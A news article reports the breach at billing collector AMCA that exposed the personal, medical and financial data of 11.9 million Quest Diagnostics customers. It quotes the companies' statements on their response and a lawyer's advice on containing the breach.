The American Medical Collection Agency (AMCA) said it is notifying law enforcement and conducting internal reviews following a data breach that exposed the personal information of 11.9 million customers of blood testing company Quest Diagnostics.
The AMCA told The Hill on Monday it is in the process of investigating the breach of its system, which Quest announced earlier in the day involved an “unauthorized user” gaining access to personal information including Social Security numbers, medical data, and financial information. The AMCA is a billing collection service provider for Quest.
{mosads}“Upon receiving information from a security compliance firm that works with credit card companies of a possible security compromise, we conducted an internal review, and then took down our web payments page,” a spokesperson for AMCA said.
The spokesperson noted the AMCA “hired a third-party external forensics firm to investigate any potential security breach in our systems, migrated our web payments portal services to a third-party vendor, and retained additional experts to advise on, and implement, steps to increase our systems’ security. We have also advised law enforcement of this incident.”
The AMCA “remains committed to our system’s security, data privacy, and the protection of personal information,” the spokesperson said.
Quest said Monday it is “taking the situation very seriously,” and is “committed to the privacy and security of our patients’ personal information.” The company also said laboratory results were not accessed by the unauthorized user.
Quest also said the AMCA has not yet given them “complete information” on the breach, including details on which customers were impacted. The company promised to work with Optum360, another group that utilizes billing services from the AMCA, “to ensure that Quest patients are appropriately notified consistent with the law.”
Stephen Breidenbach, the co-chair of the Cybersecurity, Privacy, and Technology Practice Group at New York law firm Moritt Hock & Hamroff, told The Hill the AMCA needs to zero in “closing the door” the attacker used to get into the company’s system.
“It’s very important at this stage that AMCA contain the breach and ensure the attacker has not established a method to reenter AMCA’s systems,” Breidenbach said, such as identifying any potential software that may have contained a vulnerability that allowed the attacker access.
Breidenbach cautioned that even if the AMCA believes it has identified how the attacker got into the system, it needs to make sure there aren’t still other avenues for them to use again.
“Just because the company found and closed the door that the attacker came through does not mean all the doors to the business (e.g., other unpatched programs) are shut,” Breidenbach told The Hill. “It also doesn’t prove that the attacker never established an alternative method of entry, such as installing his/her own software that allows the attacker to reconnect to the network independent of the vulnerability.”